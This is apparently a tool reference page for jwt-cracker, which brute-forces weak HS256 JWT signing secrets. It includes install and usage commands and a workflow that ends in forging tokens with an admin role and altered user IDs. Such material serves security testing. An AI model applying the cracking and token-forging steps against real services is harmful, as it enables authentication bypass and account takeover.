Description
jwt-cracker brute forces the secret key of HS256-signed JWT tokens. If the signing secret is weak, this tool will recover it, allowing you to forge arbitrary tokens and potentially bypass authentication.
Installation
BASH
npm install -g jwt-crackerBasic Usage
BASH
# Crack JWT secret (alphanumeric, max 6 chars)
jwt-cracker "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c"Advanced Usage
BASH
# Custom character set
jwt-cracker "TOKEN" "abcdefghijklmnopqrstuvwxyz0123456789"
# Longer max length (slower)
jwt-cracker "TOKEN" "abcdefghijklmnopqrstuvwxyz" 8
# Common charset
jwt-cracker "TOKEN" "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$" 6Common Workflows
BASH
# Step 1: Extract JWT from Authorization header or cookies
# Step 2: Decode header to confirm HS256: echo "HEADER" | base64 -d
# Step 3: Crack the secret
jwt-cracker "TOKEN" "abcdefghijklmnop0123456789" 6
# Step 4: If cracked, forge tokens:
# Change role to admin, modify user ID, extend expiration
# Use jwt.io or python-jwt to sign with the cracked key